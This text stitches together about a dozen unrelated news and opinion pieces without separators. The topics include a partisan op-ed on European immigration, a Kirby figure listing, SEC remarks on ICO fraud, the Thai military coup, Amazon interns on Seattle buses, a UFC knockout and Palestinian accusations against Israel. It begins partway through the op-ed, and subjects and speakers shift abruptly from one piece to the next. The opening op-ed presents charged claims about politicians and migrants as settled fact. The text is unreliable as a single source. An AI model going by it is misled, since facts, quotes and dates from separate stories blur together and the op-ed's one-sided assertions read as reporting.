What will be the long-term effects of this ? I would suggest that , as noted scholar of Islam Daniel Pipes has pointed out , the European publics will migrate further and further to the political right . And in reaction the European political class will migrate further and further to the left . You can already see it . In Sweden one liberal newspaper editor responded to the latest polling triumphs by the until-recently pariah Sweden Democrats by saying that he would be happy to flood Sweden with ISIS fighters in order to punish the Swedish electorate for voting for the Sweden Democrats . That is n't such an unusual instinct . It is the same instinct that made one female refugee aid-worker and her colleagues hush up her recent rape at the hands of some recent arrivals . They feared that mentioning the rape might exacerbate anti-immigrant sentiment in Europe . This instinct fears that the European publics are far-Right extremists just waiting to break out , and the sad irony is that only by treating them in such a way for such a long time could anyone ever make them so .
The part of our brain that has fallen for the myths all these years has pushed restrictions on speech and behaviour and it is pushing them now . Sitting beside Mark Zuckerberg of Facebook at a UN lunch the other week in New York , Chancellor Merkel was heard by a microphone that was still live asking Zuckerberg what he was doing to stop Europeans writing anti-immigration things on Facebook . “ We 're working on it , ” was his reply .
And so we see the manner in which our continent will blow—restricting legitimate concerns and dismissing honest fears as dishonest bigotries . The only good news is that this suicidal part of our European mind , which has been the dominant part for several decades now , is beginning to lose ground to the part of the brain that still has some survival instinct . Perhaps it will succeed in wrestling back our collective mind . Perhaps it will be too late . What is certain is that after the dead of Paris are mourned the European publics will ask of their politicians why they have spent years setting the scene for just such attacks to happen . After the firebombing of Charlie Hebdo 's offices the French Foreign Minister , Laurent Fabius , criticised the magazine 's publication of cartoons of Mohammed , saying , “ Is it really sensible to pour oil on the fire ? ”
The European publics are beginning to ask , “ Who made our societies into this fire ? ” There will be many physical casualties to come . But the next political casualties should be the entire political class who fed us lies for years because they themselves would not face up to some bitter truths .
Kirby is back , and this time with his robot armor !
From `` Kirby : Planet Robobot '' comes a Nendoroid sized version of the Robobot Armor that Kirby makes use of in the game - the armor stands approximately 15cm in height ! Nendoroid Kirby can be placed inside the Robobot Armor just like he does in the game and the armor features articulation at all of its joints allowing for various dynamic action poses !
In addition , a special Planet Robobot version of Nendoroid Kirby that features an all new face plate to recreate the box art of the series is included with the armor , and a helmet part for Nendoroid Kirby is also included ! Add this Robobot Armor to your collection and bring out the atmosphere of Dream Land more than ever before !
The nature of initial coin offerings ( ICOs ) makes it harder to catch fraudsters compared to penny-stock scams , the chairman of the Securities and Exchange Commission ( SEC ) told a Congressional committee today .
Jay Clayton appeared before the House Financial Services Committee during a session dedicated to the SEC . The event covered a range of topics , including a hack of the ageny 's corporate filing system , EDGAR , last year .
Yet just after the recess , Congressman Ed Perlmutter ( D-CO ) asked about Clayton 's position on ICOs , remarking that “ it reminds me of the old days with these penny stocks . ”
Clayton – who said last week that he is “ concerned ” about the risk of the funding use case being used to facilitate pump-and-dump frauds – echoed those comments , stating that he believes his agency is up to the task of policing token sales .
He told the committee :
“ I 'm cautiously optimistic about the division 's enforcement of this . They know this is a ripe area for pump-and-dump . Pump-and-dump – it 's actually easier here than it is in the penny stock area , because it 's all electronic , it 's all anonymous , [ and ] it 's harder to catch the bad guys at the end of the day . ”
The SEC chair also suggested that the prevalence of potential fraud could hamper wider adoption of the tech in capital markets . Outside of the ICO use case – through which startups or other parties can issue cryptographic tokens in an effort to fund or bootstrap a new blockchain network – market operators have looked at the tech as potential replacements for existing trading and post-settlement systems .
But according to Clayton , that work could be impaired – particularly in the absence of wider education on the risks involved with ICOs .
“ It 's going to be a lot harder to get the benefits of this kind of technology , technological advancement , ” said Clayton .
Image via YouTube
C.D . Madsen proved this week that it 's never too late to make your first hole-in-one .
The 99-year-old aced the 108-yard , par-3 16th with a six iron at Marin Country Club .
Congratulations to 99 year old C.D . Madsen on his first hole-in-one today on # 16 using a 6-iron from 108 yards . Mr. Madsen also shot an 85 ! — Marin Country Club ( @ marinccgolf ) April 19 , 2017
Madsen has been a member at the Novato , Calif. club for 58 years , according to Bay Area Fox affiliate KTVU . It 's not like Madsen was hacking it around the course , either . He had a good round going before the ace at 16 and shot 85 on the day .
Such is the beauty of golf . Most sports are too physically taxing to continue playing past a certain age , but this is indeed a lifetime game . We do n't know of any 99-year-olds capable of dunking a basketball or hitting a home run , but the potential for an ace exists as long as one continues to tee it up .
NEW YORK ( AP ) – One playoff victory was good enough for Mike Woodson to return as New York Knicks coach — even with Phil Jackson lurking as a potential candidate .
Woodson knows more will be asked of him now .
`` I know expectations are high and they should be high , '' Woodson said during a conference call , `` and I 'm looking forward to the challenge and that 's why I was elected come to back . ''
The Knicks removed the interim tag Friday and announced they had given Woodson a multiyear contract extension , rewarding him for a terrific finish to what had been a turbulent season .
USA TODAY Sports on Twitter ! To get the latest sports news from USA TODAY , including game results , columns and features , follow us on Twitter at @ USATODAYSports .
Woodson led the Knicks to an 18-6 record after replacing Mike D'Antoni on March 14 . The Knicks lost 4-1 to Miami in the first round , snapping an NBA-record 13-game postseason losing streak by winning Game 4 for their first victory since 2001 .
Still , there was speculation that Madison Square Garden chairman James Dolan would open one of the league 's biggest check books to go after Jackson , the 11-time champion coach and former Knicks player who sat out last season after retiring from the Los Angeles Lakers .
Yet the Knicks never looked anywhere beyond Woodson , believing they can continue to improve with a full season of his coaching .
`` I think Woody earned the right to be the first person we talked to and turned out to be the only person we talked to because our discussions with him after the season really reflected why he was so successful during the season , '' general manager Glen Grunwald said .
`` We thought he was the right guy for this team at this time . Obviously , there are some great coaches out there that had we opened up the search would have been called , mainly Phil Jackson , who 's the most successful coach in NBA history , but we felt Woody was our guy and he showed it during the season and our discussions after the season . ''
Woodson shrugged off the Jackson speculation .
`` Tremendous coach , I know his name 's been mentioned a lot , but that was not my concern , '' Woodson said . `` My concern at the time was coaching the New York Knicks the period that I had to coach and Mr. Dolan decided to bring me back . ''
Neither the Knicks nor Woodson would disclose the terms of the deal .
A first-round draft pick of the Knicks in 1980 , Woodson returned to the team last summer as an assistant coach , providing a defensive-minded voice to D'Antoni 's staff . Woodson 's influence , combined with Defensive Player of the Year Tyson Chandler , moved the Knicks into the top half of the league 's defensive rankings after they had been one the worst teams for years .
D'Antoni resigned March 14 when the Knicks were 18-24 and in danger of missing the playoffs . Woodson won his first five games and was praised by players for holding them more accountable to playing defense . Most importantly , he got the most out of Carmelo Anthony , who was having a disappointing season in D'Antoni 's offense but was April 's Eastern Conference player of the month .
`` Mike took over the team under challenging circumstances and made it clear , starting on day one , that he was going to hold every player on our roster accountable , '' Dolan said in a statement . `` We saw a significant improvement since Mike took over and believe our team will only keep improving under Mike 's direction . ''
Woodson denied recent reports that he had replaced agent Joe Glass under pressure from Dolan to avoid having to work again with former coach Larry Brown 's representation . Woodson confirmed he switched to CAA , but said it was his choice and that agent Terry Prince had worked on his contract .
Anthony , Chandler and fellow star Amar ' e Stoudemire had all backed Woodson 's return when the season ended . And his chances of returning improved when the Knicks removed the interim tag from Grunwald , his former college teammate at Indiana , late in the regular season .
Woodson previously spent six seasons as coach of the Atlanta Hawks , improving his win total in every season until they went 53-29 in 2009-10 . But he was n't retained after they were swept in the conference semifinals for the second straight year .
He then sat out a year before interviewing last summer for openings in Detroit — where he was an assistant on the Pistons ' NBA championship team in 2004 — Minnesota and Houston . He then was hired by the Knicks on Aug. 29 .
Woodson has a career 224-292 record as an NBA coach .
A New Jersey woman nearly gifted her Jewish best friend a set of Cynthia Rowley tea towels — until she realized they were stamped with black swastikas .
Natalja Maxwell purchased the two-pack of Paris-themed towels for $ 5.99 from a Marshalls & HomeGoods in Secaucus on April 11 , thinking they were perfect as a Passover gift .
“ They looked so pretty . I love Paris , ” she said .
But when Maxwell got home , she noticed the hate symbols in the middle of one of the towel 's windmill designs ( inset ) , right beside whimsical Eiffel towers and bicycles .
“ It 's like six , seven , eight [ wind ] mills on the towel and a huge swastika , ” said Maxwell , 45 , who lives in Paramus . “ Not tiny — like huge , big-sized swastikas . ”
Maxwell did n't return the set because she did n't want the possibility of it being sold to another ­unwitting customer .
She instead filed letters of complaint with Marshalls , Cynthia Rowley and the Anti-Defamation League but never heard back from them .
“ We do n't need money , we 're just trying to tell them , ‘ Do n't sell this stuff , it 's gross , ' ” she said .
TJX , the parent company of Marshalls and HomeGoods , told The Post it 'll pull the towels off its shelves and destroy them .
“ We sincerely regret the offense this has caused , ” the company said in a statement .
In his official announcement that the coup had taken place , army chief General Prayuth Chan-ocha said : `` In order for the situation to return to normal quickly and for society to love and be at peace again ... and to reform the structure of the political , economic and social structure , the military needs to take control of power . '' Soldiers stand guard during a coup at the Army Club where Thailand 's army chief held a meeting with all rival factions in Bangkok . Credit : Reuters After this announcement , the army suspended the constitution and banned gatherings of more than five people . Although the 2007 constitution has been suspended , the Senate upper house will continue to function . The army named 17 people on television who should report to the army . First on the list was deposed Prime Minister Niwattumrong Boonsongpaisan . An army spokesman said people should remain calm and continue to go about their normal activities .
`` We will provide security for foreigners , '' he said . Thai and foreign journalists watch and listen to the announcement of the coup on television at the Army Club 's press centre in Bangkok . Credit : AP The curfew will affect tens of thousands of tourists in resort areas like Phuket , Chiang Mai and Pattaya . It is also expected to create chaos for travellers arriving into and leaving the country and will affect dozens of flights , because passengers are prohibited from travelling after 10pm . A spokesperson for the Department of Foreign Affairs and Trade urged all Australians travelling to Thailand , or already in Thailand , to continue to exercise a high degree of caution and to pay close attention to their personal security . Thailand 's army chief General Prayuth Chan-ocha ( left ) leaves after meeting with anti-government and pro-government leaders . Credit : AFP
`` Suvarnabhumi International Airport and Don Mueang Airport in Bangkok are operating normally , '' the spokesperson said . `` Authorities have advised that the curfew will not apply if travelling to or from an airport . Travellers should have passports and tickets with them when travelling to and from the airport . Thailand 's military has launched a coup three days after insisting its troops would not stage a full takeover . Credit : Apichart Weerawong `` Australians should follow the instructions of local authorities and avoid all demonstrations , protest sites , political events and large-scale public gatherings . Australians travelling to Thailand should visit www.smartraveller.gov.au , familiarise themselves with the travel advice , subscribe to receive regular updates and register their travel plans . '' Embassies around the world advised their citizens in Thailand to exercise extreme caution .
Many Thais will not know about the curfew because Thai television and radio stations have been taken off the air , although the internet and social media sites like Twitter are still operating . International television stations like the ABC 's Australia Network , CCN and BBC were taken off at least one cable channel provider . The Cartoon channel was even taken off air . Troops have been deployed in large numbers across Bangkok , where major shopping centres have closed early and restaurants , bars and other businesses are shuttered . They entered television stations that were not already closed and the stations that remain open began playing soothing music . Troops were also in newspaper offices . Workers rushed to public transport to get home before the 10pm curfew . Roads were also choked with people going home . Troops manned dozens of check points at major intersections .
As commanders appeared on television about 5pm Bangkok time ( 8pm AEST ) to declare they had taken over , the leaders of both rival political parties in Thailand were taken away in a van amid dramatic scenes at the Army Club in central Bangkok , where talks were being held to try to find a resolution to six months of sometimes violent unrest . A military source said the leaders were told `` we will keep you together until you understand and love each other '' . Formally announcing the coup on television , General Prayuth said martial law had moved to a full-blown coup , to quell political violence and `` ensure fairness for every side '' . '' To restore peace back to the country in a short time and to reform the country 's politics , economy and society , the Thai military , army , navy , air force and police have seized power from May 22 onward , '' General Prayuth said . `` I ask the people to remain calm and carry on with their business as usual . ''
Not long after the announcement of the coup , a burst of gunfire was heard on Uttayan Road , where the pro-government Red Shirt protesters have been camped . Earlier , soldiers who arrived in trucks at a Red Shirt campsite on the western outskirts of Bangkok said they would take people home . They arrested key Red Shirt leaders who were on stage at their rally site . Reports said soldiers had asked Red Shirt protesters to stay put and lie face down on the ground . A photo shared via Twitter showed Red Shirt guards and protesters ducking down as soldiers moved in on the protest . The Red Shirt group posted on Twitter : `` Now it is a coup - stand-by for retaliation . '' At least five top Democrat opposition party officials were in detention , including leader Abhisit Vejjajiva . The Democrat party boycotted elections in February that were later annulled by the Constitution Court .
Soldiers surrounded the house of veteran politician and former Labor minister Chalerm Yumbumrung and detained him and two of his sons . The Red Shirt centre posted another message on Twitter saying `` many of our co-leaders have been detained without whereabouts ( known ) - they are most likely detained at an army base . '' Interim Prime Minister Niwattumrong Boonsongpaisan learnt of the coup while at the Commerce Ministry . He had stayed away from the Army Club talks . Mr Niwattumrong said he then went to offices of the former ruling Pheu Thai party and then to an unknown location . Staff in the prime minister 's office said they did not know where Mr Niwattamrong was , and the US embassy denied he had taken shelter there .
Unconfirmed reports said he had been arrested . Earlier on Thursday , Mr Niwattumrong insisted he would not resign and said his caretaker cabinet would remain in office until a new elected government was formed . The army declared that the coup commanders were operating through a body called the National Peacekeeping Committee . The coup is the 19th staged by the country 's powerful armed forces since 1932 . The takeover will enrage Red Shirt supporters of the caretaker government that wanted to push ahead with fresh elections .
Red Shirt leaders had vowed to rise up if the government that was elected in a landslide victory in 2011 was unconstitutionally deposed . The military 's move is expected to be condemned by countries around the world , including Australia . The US will consider imposing sanctions on the military , a close ally . General Prayuth is expected to move swiftly to appoint a new government . A front-runner for the prime ministership is Kittipong Kittayarak , a former Permanent Secretary of the Justice Ministry . Dr Kitttipong has been involved in judicial reform in Thailand for more than a decade .
A graduate of Cornell Law School in the United States , he is on the board of Transparency International Thailand and has lectured at major Thai universities . Political analyst Thittinan Pongsudshirak said it was likely a new military-backed government would be installed within days . Loading `` I am afraid over in the coming days and weeks there will be turmoil , '' he said . `` Pro-government Red Shirts are likely to come out in large numbers . ''
HORRIFIED villagers say gas spewing from cracks opening in the earth is the opening of a gateway to hell .
The region in the state of Tobasco , Mexico – famous for its hot sauce – is under investigation by geology experts after cracks were reported in Chacalapa , a rural suburb in south east Mexico . Vegetation around the eruptions has been killed and the sickening fumes have driven people from their homes .
CEN FEARS : Men in Hazmat suits investigate gas-spewing cracks in the ground
CEN INVESTIGATION : The phenomenon has sparked fears a gateway to hell has opened
“ The gas comes from the land and nobody does anything to know if it is dangerous or not ” Carlos , villager Many villagers , reports local media , are convinced that the cracks are a supernatural gateway to the `` Inferno '' – or hell . One villager called Carlos said : `` The gas comes from the land and nobody does anything to know if it is dangerous or not . `` Nobody says a word of what is happening in our community . It is near a dirty space , but a crack opened and a vapour with strong sulphur smell comes from there until eyes sting . '' Experts wearing yellow chemical hazard suits have been seen digging and taking scientific readings at the cracks .
CEN MYSTERY : City councillor Dominga Castillo Lopez said the cause of the cracks is unknown
City councillor Dominga Castillo Lopez said what caused the cracks remains a mystery . He said : `` Neighbours told me that near this place there is a dirty area , where smoke comes out , vapour with a sulfur smell . `` But it is unknown what is happening currently there . '' Other villagers believe they may have been an underground explosion , triggered by attempts to exploit oil reserves .
World 's most damaging natural disasters The world has witnessed numerous disasters over the centuries and although most are man-made due to wars and terrorism , mother nature certainly dishes out her fair share of damage . 1 / 58 Barcroft Deadly Tornado hits Uruguay , April 2016
Irish and philosophy are two words that do n't normally go together – except in the context of touristy T-shirt slogans , or twee “ seanfhocail ” once parodied by Flann O'Brien .
Ireland has a reputation for anti-intellectualism . Even The Irish Times has ( until now ) failed to report the existence of World Philosophy Day , which is being celebrated internationally for the 10th time today . “ You ca n't plough a field by turning it over in your mind , ” runs an old Irish proverb , and for many this sums up the value of philosophy : as it ca n't be obviously monetised , it must be worthless .
“ In France , people know their Marx , Freud and Camus ; people will engage intelligently with each other , ” says Paul O'Grady of TCD 's philosophy department .
“ In a way , we have gone from a premodern to a postmodern society without a long period of modernity . We 've gone from John Charles McQuaid to Father Ted without anything in between . ”
That 's not to say deep thinking is extinct in Ireland , however . As illustrated by the proverb above , one of many collected by psychologist Aidan Moran , there is a rich tradition of using maxims or aphorisms in public discourse . While Prof Moran admits he ca n't think of too many that “ celebrate the power and beauty of thinking ” , Irish proverbs can contain “ deeply ingrained psychological wisdom ” .
Aphorisms – original thoughts expressed in memorable form – are a good place to start in evaluating Ireland 's intellectual health . Phrases from “ live for today ” to “ let he who is without sin . . . ” surround us in advertisements , greeting cards , fridge magnets and even tattoos .
This continues a tradition from ancient Greece of not just documenting maxims but plastering them on everything from paintings to pottery . Informing the practice was the idea that people could strengthen their character if , as Plutarch put it , they “ meditate on coping remedies before trouble comes , so that they are more powerful from practice ” .
Prof Moran agrees that aphorisms can influence behaviour – for good or bad . He notes that there are many Irish proverbs relating to the power of nature . “ Oddly enough , that seems to have had an effect in seafaring . A lot of fishermen never learned to swim and may have taken that fatalistic view of life which can be found in a lot of the sayings – along the lines of ‘ the sea must have her own ' . ”
Similarly , some aphorisms can contribute to what psychologists call “ learned helplessness ” whereby people see no connection between actions and rewards . “ For instance , someone who is rejected for a job interview might say ‘ it 's not what you know , it 's who you know ' , and that could be quite corrosive , a pithy phrase being used [ to justify ] not doing anything . ”
On the other hand , “ a good aphorism could well be seen as a good starting point or end point in a therapeutic session ” . This highlights the paradoxical nature of such sayings . Not only can they contradict each other – eg “ out of sight , out of mind ” vs “ absence makes the heart grow fonder ” – but each one is usually open to a variety of interpretations . Thus “ circumstances always have to be taken into consideration when applying them ” , says Prof Moran , who co-authored a book on the subject : Timeless Wisdom : What Irish Proverbs Tell Us About Ourselves .
Dr O'Grady shares this concern about aphorisms being consumed without reflection . He notes a phrase such as “ live in the now ” could be viewed either as “ advocating hedonism ” or “ from a Zen Buddhist perspective , as saying you should pay really clear attention to what is happening in the present . To me , this points up the importance of the process . . . Philosophy is an activity . So the aphorism is the end point but the working through is where the energy and the pay-off is . ”
Surface tension
“ Whatever the ideals you have , secular or religious , ” says Dr O'Grady , “ it 's important that they percolate through your life so it 's not just a surface thing . One of the reasons Catholicism has imploded so dramatically is because it was a surface thing in Ireland ; it was more of a cultural connection . ”
Theologian Vincent Twomey also has harsh words about the way Catholicism has traditionally been practised , citing a “ lack of intellectual ferment ” in the Irish church . However , he notes , “ aspects of liturgy ” filter “ quite unconsciously ” through daily conversations . People talk about “ sins of omission ” or “ absolution ” , and use Christian aphorisms when debating current affairs . “ We forget , even in secular Ireland we are steeped in Christian memory. ” Look no further than “ do on to others as you wish done on to you ” , a maxim shared by the world 's major religions ( and part of “ the primordial conscience ” ) .
“ If you think that [ credo ] through you have the whole moral law , ” he says . “ It struck me that a lot of the Synoptic Gospels – not John but Matthew , Mark and Luke – are really a collection of maxims from Our Lord. ” But , he argues , these values can not be taken out of context . Christian morality is founded on “ love God and love your neighbour as yourself , and if the first is left out the second makes no sense ” .
As for Ireland 's philosophical record , Dr Twomey believes “ the only serious thinker we had ” was John Scottus Eriugena , a ninth-century scholar who featured on the old £5 banknote . Yet he is optimistic , sensing a public appetite for deeper reflection : “ I see the present situation in Ireland is preparing the ground for genuine discussion and study. ” He is hoping to set up a forum for “ Irish people of good will ” .
Dr O'Grady also believes there is an untapped intellectualism here , informed partly by the “ very strong philosophical undercurrent ” in Irish literature . Joyce drew on Aristotle and Aquinas ; Beckett on Descartes ; and Yeats on the likes of Plato and Berkeley , he points out . “ Philosophy is not absent but it has not been taken neat . ”
He also notes “ points have been rocketing ” for philosophy at third level as students see it as a discipline for self-development in an uncertain job market .
Unlike many EU states , however , Ireland does not teach the subject at second level . Prof Moran says this is a serious omission : “ If you look at the development of thinking , by the time people come into mid-adolescence they reach a point of being able to think abstractly . Philosophy and psychology are ideal forms of abstract thinking . You could say the same about mathematics but it 's not taught that way .
“ So I would ask : where is the subject to allow people use their new-found capacity for abstract thinking in Irish schools ? There is definitely a gap . ”
What is your favourite philosophical saying ?
“ He who has a why to live can bear with almost anyhow . ”
– Friedrich Nietzsche
“ When I went blind at 22 , I read this quote in Viktor Frankl 's book Man 's Search for Meaning , and it stayed with me . I broke my back two years ago . Now I am living with paralysis , I continually ask myself “ why ? ” , not “ why me ? ” , but “ why am I doing what I 'm doing ? ” And I know why . . . This credo reminds me to look forward and to fill my life with great things . ”
Mark Pollock , adventure athlete
“ Work of seeing is done . Now begins the work of the heart . ”
– Rainer Maria Rilke
“ This comes from an unpublished 1914 fragment called Turning . . . and will resonate with anyone who ( like Rilke himself ) shifted from country to country , city to city , living by the thrill of externality and difference , before returning ( as I did myself some years ago ) to a first and last world , where eye and will no longer matter , and life is the same every where . ”
Prof Harry Clifton , Ireland professor of poetry
“ Tóg go bog é agus bogfaidh sé chughat ( Take it easy and it will yeild to you ) . ”
“ As a young child my father often told me [ this ] . The essence of my father 's message was that if we say ‘ Yes ' to life and not resist or fight it , then life will come freely , gently and fully . . . What happens here , now , is my responsibility . It is not a matter of doing great things : it is a matter of doing or saying small things with responsibility and courage . ”
Sr Stanislaus Kennedy , author and member of Sisters of Charity
“ The mind is not a vessel to be filled , but a fire to be kindled . ”
– Plutarch
“ I feel very lucky to have received a good education and to have developed a love of learning . . .
A good education does n't mean remembering the date of the Battle of Waterloo , or being able to recite Shakespeare from memory . . . A good education uses knowledge and data to guide a student towards ideas of their own . ”
Dr Aoife McLysaght , TCD Evolution Lab
“ Ní huasal ná íseal ach thuas seal agus thíos seal ( It is not a matter of being upper or lower class but of being up for a while and then down for a while ) ”
“ It 's a proverb that reminds us that life has its ups and downs , and you should n't get too caught up in things . The sound of it is great , too . I also like , Mura mbeadh agat ach pocán gabhair , bí i lár an aonaigh leis – if you have only a buck goat , be in the middle of the fair with him . ”
Prof Aidan Moran , psychologist
However you measure it , Amazon 's impact on Seattle is indisputable . Here 's a new metric : summer interns . Amazon has so many that King County Metro has adjusted bus service just for them .
At 8:18 Wednesday morning 23 people with identical black backpacks — fold-over top , metallic buckle , five leather zippers pulls , water-bottle sleeve — boarded a Route 70 bus at the University of Washington .
Eight minutes later 13 more people with the same backpack boarded another 70 bus .
At 8:40 , 21 matching backpack-carriers got on the 70 , and at 8:42 15 more .
At 8:55 , two number 70 buses arrived at the same time and both were swamped with people carrying the black backpack — too many to count , both buses packed to the gills .
Learn more about Traffic Lab » | Follow us on Twitter » Traffic Lab is a Seattle Times project that digs into the region 's thorny transportation issues , spotlights promising approaches to easing gridlock , and helps readers find the best ways to get around . It is funded with the help of community sponsors Alaska Airlines , CenturyLink , Kemper Development Co. , NHL Seattle , PEMCO Mutual Insurance Company and Seattle Children 's hospital . Seattle Times editors and reporters operate independently of our funders and maintain editorial control over Traffic Lab content .
Each one of those backpacks also had one more identifying characteristic , a small tan arc with an arrow on the right pointing upward — the Amazon Smile .
Each of Amazon 's summer interns this year received the same backpack .
From booming jobs to gentrification , from omnipresent cranes to housing shortages , there 's any number of ways to measure how Amazon 's presence has reshaped Seattle . But here 's another one : Amazon 's summer interns — just the interns — can overwhelm bus routes in the city , causing King County Metro to send more buses to accommodate them .
Beginning Wednesday , Metro added two additional buses to Route 70 , which runs between the University District and downtown via Amazon 's home in South Lake Union .
Those added buses , which bring the route 's total to 18 on weekdays , will run indefinitely , Metro said .
And while Metro is reluctant to pin the change solely on the influx of interns , it 's not hard to make the connection .
“ Amazon did inform us that their internship program was growing , ” Scott Gutierrez , a Metro spokesman , said .
How many Amazon interns are there ? More than 900 will be living in University of Washington dorms and apartments this summer , Victor Balta , a university spokesman said . Amazon is paying UW $ 2.8 million to house the interns , Balta said .
But not all the interns — maybe not even half — are staying at UW . An Amazon spokesman did not respond when asked how many interns the company has in Seattle .
A half-dozen interns waiting for buses gave varying answers , anywhere from 1,500 to 3,000 summer interns in Seattle , with the consensus being around 2,000 .
A Facebook group restricted to Amazon Seattle 2017 summer interns has more than 1,700 members .
The company has more than 25,000 local workers , and last year it had more than 8,000 job openings in Seattle .
Amazon runs four private shuttles between the two campuses — UW 's in Montlake and its own in South Lake Union — and expects that number to increase . But there were long lines and full seating on those shuttles Wednesday morning .
So what 's the quantitative impact of the interns on Route 70 — generally the 14th busiest of Metro 's 185-or-so routes ?
Assume that only half of Amazon 's UW-based interns ride the 70 , but ride it to and from work each day . That 's 900 rides , or a 12 percent increase in the route 's daily 7,400-rider average .
Metro added buses after reports of overcrowding earlier this week . Some riders farther down the line reported as many as six buses passing them by in the morning , unable to stop because they were full with passengers .
This is the third summer Amazon interns have stayed at UW .
“ I take it year-round , and this time of year buses start passing by , ” said Kate Duran , a researcher at Fred Hutch , just as a full bus passed by her stop on Eastlake Avenue , a mile downstream from UW .
“ Once crowds start to build up , it can be like three buses going by , ” said Ryan Gorup , himself an Amazon employee ( full-time ) , as he waited for the bus on Eastlake with his shepherd-husky mix , Toby . “ It really snowballs . ”
One of those two buses that arrived at the UW simultaneously at 8:55 — and was subsequently swamped with backpack-toting summer Amazonians — was one of the additional buses that Metro added to the route Wednesday .
As he crossed the University Bridge the driver announced that because the bus was full he 'd be making no stops unless someone rang the bell .
He drove a standard single bus , not one of the articulated double buses that bend accordionlike in the middle and can carry more passengers .
“ Next time they 'll probably send a 60-footer instead of this 40-footer , ” he said .
Mexican drug cartels grow pot in U.S . Most discussions of Mexican drug wars focus on the smuggling and the gang violence that threatens the border areas . But now the Mexican cartels have caught on and found a new way to get drugs in the U.S. Mexican drug cartels are increasingly active inside the United States , producing homegrown marijuana and gaining new urban footholds , officials say . ... The four largest Mexican cartels -- the Federation , the Tijuana Cartel , the Juarez Cartel and the Gulf Cartel -- now operate in 195 U.S. cities , up from about 50 cities in 2006 , a Justice Department report indicates . One reason is that marijuana sales have been a steady and lucrative business for them , virtually unrelated to the ups and downs of other drugs . `` Marijuana is the king crop , '' Special Agent Rafael Reyes of the Drug Enforcement Administration told the Times . `` It consistently sustains its marketability and profitability . '' Mexican drug traffickers have also moved into hydroponic marijuana production -- cannabis grown indoors without soil and using sunlamps , officials said . Next up : Mexican landscapers grow marijuana in your backyard . Now that 's what I call market synergy ! Next up : Mexican landscapers grow marijuana in your backyard . Now that 's what I call market synergy ! » more at : www.upi.com Posted By jamesk at 2009-02-02 11:35:58 permalink | comments » More ways to bookmark this page
Comments ( 4 )
Josh Emmett went from an unranked prospect to the No . 5 featherweight in UFC with his devastating first-round upset over Ricardo Lamas at UFC on FOX 26 .
Emmett , serving as a late replacement for Jose Aldo , knocked out Lamas with a hellacious left hook just four minutes into UFC on FOX 26 's co-main event . The win instantly rocketed Emmett into the top five of the UFC 's media-generated featherweight rankings , and now the 32-year-old Team Alpha Male product has his sights set on taking one more step closer toward UFC gold .
“ I want to be a world champion like I said , so if something was presented to me like a title shot , like I said , I 'll take that in a heartbeat , ” Emmett said on The MMA Hour after UFC on FOX 26 . “ But I know ( Frankie ) Edgar and ( Max ) Holloway , they 're in talks about fighting . I think Edgar has definitely earned it , so what makes the most sense to me is maybe if Brian Ortega and I fight . The winner of us gets the winner of Edgar-Holloway . ”
In a strange twist of fate , it was Edgar and Holloway who were directly responsible for Emmett 's opportunity to fight Lamas at UFC on FOX 26 . Edgar was forced to pull out of his Dec. 2 title contest against Holloway after suffering a fractured bone in his face , which led Aldo to be tapped as a replacement . That left Lamas without an opponent for Dec. 16 , and Emmett gladly stepped up to accept the challenge .
Emmett ultimately missed weight against Lamas , which put a significant damper on a performance that was otherwise the best of his career . But UFC on FOX 26 still served as a shining moment of validation for Emmett that he belonged , and it 's a moment Emmett always believed would come , even if the road to get there was longer and more winding than he ever expected .
“ This is the longest I 've gone without a finish , so I knew I was overdue for one and I kept saying , ‘ Hey , I 'm going to get one on Saturday , ' ” Emmett said . “ I wanted to go in there and I wanted to do what the current and former champion could n't do Lamas , and I did it in the first round . I just , I know where I stack up . I 've been with Team Alpha Male for over a decade and I know I 'm one of the best fighters in the world . Urijah ( Faber ) told me that when I was 2-0 as a pro .
“ He said , ‘ You 're one of the best fighters in the world , just nobody knows it yet . ' And I took the hard road , so much adversity , so many injuries , and I fought time and time , ‘ Should I keep doing this ? Should I keep pursuing it ? ' But my goal was always to get in the UFC , and then once I got here , I 'm not going to stop until I 'm a world champion . ”
Not only did Emmett upset Lamas , but he did so in stunning fashion , scoring a walk-off , one-punch knockout that will be replayed on UFC highlight reels until the end of time . The stoppage was so decisive that Emmett declined to follow up with additional punches on the ground , and Lamas stayed down on the canvas for several minutes , making for an extremely scary sight .
“ Just the way I hit him , I just , I do n't know — in sparring , sometimes you land the cleanest punch and you just know . And so I felt that through my left hand and I literally saw him just fall back and his head bounce off the ground , and I was just like , ‘ That 's it , ' ” Emmett said . “ I celebrated , of course , and then when I looked back and he was still out , I do n't know , that 's kinda hard to watch . I ca n't celebrate anymore .
“ I had to take a knee and just hope he 's okay , because I know his wife and his family and his dad were there , and I can imagine what they 're going through , if my wife or my mom or something like that happened to me . I do n't wish that upon anyone , even my opponents . Like , I always hope I go in there , I get the win , a knockout like that , but we both go home safe , no injuries for our families and friends . ”
Moving forward , Emmett appears to be in line for big things in 2018 .
The California native was in attendance at UFC Fresno earlier this month to witness firsthand as another young gun in the featherweight division , Ortega , staked his claim for contendership with a submission victory over Cub Swanson . With Holloway and Edgar likely busy with each other in early 2018 , Emmett believes a top contender fight between him and Ortega is exactly what the 145-pound class could be looking for .
“ This is my time , and this is what I 've been wanting for so long , and I knew it would come eventually , ” Emmett said . “ I just had to keep chipping away and grinding at this , what I 've been chasing . And it 's here , and that 's why I seized the opportunity . I pounced on the opportunity to fight Lamas , and I just ca n't wait to see what 2018 holds for me . ”
On Tuesday we asked if Israel provoked rockets from Gaza to pressure Palestinians to back off UN bid , the next day all hell broke loose . Thursday we reported the Palestinian UN envoy claimed Israel 's attack on Gaza was ‘ deliberately timed to torpedo the UN vote . ' Yesterday Abbas accused Israel of instigating a “ blood bath . ”
Reuters :
Palestinian President Mahmoud Abbas accused Israel on Friday of launching an assault on the Gaza Strip to undermine his efforts to secure a diplomatic upgrade at the United Nations .
Israel began its air offensive on Wednesday with the declared aim of stemming surges of rocket strikes by Islamist militants that have disrupted life in southern Israeli towns .
Abbas , whose forces were chased out of Gaza by Hamas in 2007 , accused Israel of instigating a “ blood bath ” , telling reporters he thought the escalating military campaign was aimed at sinking his own diplomatic maneuverings .
……
“ Everything that is happening is in order to block our endeavors to reach the United Nations , ” Abbas told journalists .
… .
“ Undoubtedly we consider that this aggression is against us , the Palestinian people , ” he said .
Despite the violence , he said he would push ahead with plans for a vote at the U.N. General Assembly before the end of the month to give the Palestinians the rank of an “ observer state ” within the world body rather than the present “ observer entity ” .
The upgrade would enhance Palestinians ' legal rights at a time when peace negotiations with Israel have hit a wall over Israel 's refusal to halt settlement building in territory where the Palestinians want their state .
